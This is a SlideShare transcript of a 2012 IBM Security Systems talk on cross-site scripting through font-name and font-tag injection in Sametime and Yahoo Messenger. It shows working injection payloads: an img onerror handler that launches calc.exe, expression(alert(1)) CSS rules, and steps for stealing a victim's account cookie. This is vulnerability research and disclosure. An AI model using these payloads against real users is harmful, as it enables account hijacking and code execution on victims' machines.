SlideShare a Scribd company logo
© 2012 IBM Corporation
IBM Security Systems
1© 2012 IBM Corporation
Stylish XSS
via Font Name Injection
© 2012 IBM Corporation
IBM Security Systems
2
Background - Instant Messengers
© 2012 IBM Corporation
IBM Security Systems
3
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
© 2012 IBM Corporation
IBM Security Systems
4
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
© 2012 IBM Corporation
IBM Security Systems
5
Background - Windows Fonts
Windows accepts basically any character as
part of the font name
Font name length limited to ~30 chars
© 2012 IBM Corporation
IBM Security Systems
6
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
© 2012 IBM Corporation
IBM Security Systems
7
SameTime - Exploit - CSS
Font Name: expression(alert(1));
© 2012 IBM Corporation
IBM Security Systems
8
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
© 2012 IBM Corporation
IBM Security Systems
9
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:“
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
© 2012 IBM Corporation
IBM Security Systems
10
SameTime - Exploit
~50 Fonts Later
© 2012 IBM Corporation
IBM Security Systems
11
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
12
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
13
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>
Message Received:
<span style=“…font-family:e0”>
<img x='>
© 2012 IBM Corporation
IBM Security Systems
14
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
15
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
16
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
© 2012 IBM Corporation
IBM Security Systems
17
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:windowssystem32calc.exe"'</span>
© 2012 IBM Corporation
IBM Security Systems
18
Yahoo Messenger
© 2012 IBM Corporation
IBM Security Systems
19
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
© 2012 IBM Corporation
IBM Security Systems
20
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
21
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
22
Yahoo Messenger - History View
Finally, Yahoo's
purple alert!
© 2012 IBM Corporation
IBM Security Systems
23
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
© 2012 IBM Corporation
IBM Security Systems
24
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
© 2012 IBM Corporation
IBM Security Systems
25
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome, yields the same
result.
© 2012 IBM Corporation
IBM Security Systems
26
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
© 2012 IBM Corporation
IBM Security Systems
27
Yahoo Messenger - Recap
1. Send the victim a message that contain malicious
HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history or send him
a direct link to it (after all, it not local)
4. Have the victim click the Instant Message from the
drop-down box
© 2012 IBM Corporation
IBM Security Systems
28
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
© 2012 IBM Corporation
IBM Security Systems
29
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag
sent as part of the message text, is being
rendered differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx“
id="yui_3_2_0_20_1330267588862427">33333</font>
© 2012 IBM Corporation
IBM Security Systems
30
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
© 2012 IBM Corporation
IBM Security Systems
31
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise the response came back as I hoped
<font style="font-size:1&amp;color:red" >xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
32
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
33
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
© 2012 IBM Corporation
IBM Security Systems
34
Yahoo Web Messenger - IE Version
© 2012 IBM Corporation
IBM Security Systems
35
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by
double-quotes (" ")
2. The size value must be followed by the "pt;"
suffix
<font size="15pt;"> <font style="font-size=15pt;">
© 2012 IBM Corporation
IBM Security Systems
36
Yahoo Web Messenger - IE Version
By tweaking the size value,
a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
© 2012 IBM Corporation
IBM Security Systems
37
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later,
came the following payload that bypass the
CSS filtering
<font size="15pt;font-family:expression(alert(1));">
© 2012 IBM Corporation
IBM Security Systems
38
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
© 2012 IBM Corporation
IBM Security Systems
39
Yahoo Web Messenger - IE Version
Yet somehow, no alert
© 2012 IBM Corporation
IBM Security Systems
40
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats
with myself
I finally found out what I was afraid of.
Or in other words, The "No Expression For You" Meta Tag
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
© 2012 IBM Corporation
IBM Security Systems
41
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
© 2012 IBM Corporation
IBM Security Systems
42
Yahoo Web Messenger - Finally
© 2012 IBM Corporation
IBM Security Systems
43
Yahoo Messenger - History Window
© 2012 IBM Corporation
IBM Security Systems
44
Questions?

More Related Content

What's hot

Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
Frans Rosén
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
Mitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptxMitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptx
waizuq
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
n|u - The Open Security Community
 
Nzitf Velociraptor Workshop
Nzitf Velociraptor WorkshopNzitf Velociraptor Workshop
Nzitf Velociraptor Workshop
Velocidex Enterprises
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
David Sweigert
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)
ENOInstitute
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
Michael Gough
 
Security models of modern mobile systems
Security models of modern mobile systemsSecurity models of modern mobile systems
Security models of modern mobile systems
Divya Raval
 
Application Security
Application SecurityApplication Security
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
情報セキュリティの概要
情報セキュリティの概要情報セキュリティの概要
情報セキュリティの概要
Tokai University
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
AlienVault
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре Windows
Positive Hack Days
 
Zap vs burp
Zap vs burpZap vs burp
Zap vs burp
Tomasz Fajks
 
RSA Signature Verification
RSA Signature VerificationRSA Signature Verification
RSA Signature Verification
GeorgeCallow
 
マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07
マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07
マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07
Toshiaki Maki
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
Michael Furman
 

What's hot (20)

Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
Mitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptxMitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptx
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
 
Nzitf Velociraptor Workshop
Nzitf Velociraptor WorkshopNzitf Velociraptor Workshop
Nzitf Velociraptor Workshop
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
 
Security models of modern mobile systems
Security models of modern mobile systemsSecurity models of modern mobile systems
Security models of modern mobile systems
 
Application Security
Application SecurityApplication Security
Application Security
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
情報セキュリティの概要
情報セキュリティの概要情報セキュリティの概要
情報セキュリティの概要
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре Windows
 
Zap vs burp
Zap vs burpZap vs burp
Zap vs burp
 
RSA Signature Verification
RSA Signature VerificationRSA Signature Verification
RSA Signature Verification
 
マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07
マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07
マイクロサービスに必要な技術要素はすべてSpring Cloudにある #DO07
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
 

Viewers also liked

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
Nicholas Merlin
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Miz Jaye
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
Santiago Beron, RCDD, CTS-D
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
mirajuwita
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
Santiago Beron, RCDD, CTS-D
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
Santiago Beron, RCDD, CTS-D
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
Santiago Beron, RCDD, CTS-D
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
bnoon14700
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
Santiago Beron, RCDD, CTS-D
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
bnoon14700
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
Miz Jaye
 
Ensayo
Ensayo Ensayo

Viewers also liked (13)

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
 
hjm
hjmhjm
hjm
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
 
Ensayo
Ensayo Ensayo
Ensayo
 

Similar to Stylish XSS

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
distortdistort
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
Usb hack
Usb hackUsb hack
Usb hack
Gusnar Syafaren
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
sghctoma
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
Nephi Johnson
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
Pavan Kumar
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
Nilesh Bafna
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
CA API Management
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Den Iir
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
ssuser01066a
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
James Montemagno
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
Angelo Dell'Aera
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
Gaurav Gautam
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
Aman Kohli
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
OW2
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
Carl Tyler
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Haytham Ghandour
 

Similar to Stylish XSS (20)

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Usb hack
Usb hackUsb hack
Usb hack
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
 

Recently uploaded

Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsScaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Mydbops
 
Recent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS InfrastructureRecent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS Infrastructure
KAMAL CHOUDHARY
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
Yevgen Sysoyev
 
Calgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptxCalgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptx
ishalveerrandhawa1
 
“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...
“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...
“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...
Edge AI and Vision Alliance
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
maigasapphire
 
Data Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining DataData Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining Data
Safe Software
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
huseindihon
 
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxRPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
SynapseIndia
 
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionAdvanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Bert Blevins
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
Priyanka Aash
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
Priyanka Aash
 
Observability For You and Me with OpenTelemetry
Observability For You and Me with OpenTelemetryObservability For You and Me with OpenTelemetry
Observability For You and Me with OpenTelemetry
Eric D. Schabell
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc
 
The Evolution of Remote Server Management
The Evolution of Remote Server ManagementThe Evolution of Remote Server Management
The Evolution of Remote Server Management
Bert Blevins
 
Salesforce AI & Einstein Copilot Workshop
Salesforce AI & Einstein Copilot WorkshopSalesforce AI & Einstein Copilot Workshop
Salesforce AI & Einstein Copilot Workshop
CEPTES Software Inc
 
How Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdfHow Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdf
HackersList
 
How to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptxHow to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptx
Adam Dunkels
 
Pigging Unit Lubricant Oil Blending Plant
Pigging Unit Lubricant Oil Blending PlantPigging Unit Lubricant Oil Blending Plant
Pigging Unit Lubricant Oil Blending Plant
LINUS PROJECTS (INDIA)
 

Recently uploaded (20)

Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsScaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
 
Recent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS InfrastructureRecent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS Infrastructure
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
 
Calgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptxCalgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptx
 
“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...
“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...
“Deploying Large Language Models on a Raspberry Pi,” a Presentation from Usef...
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
 
Data Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining DataData Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining Data
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
 
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxRPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
 
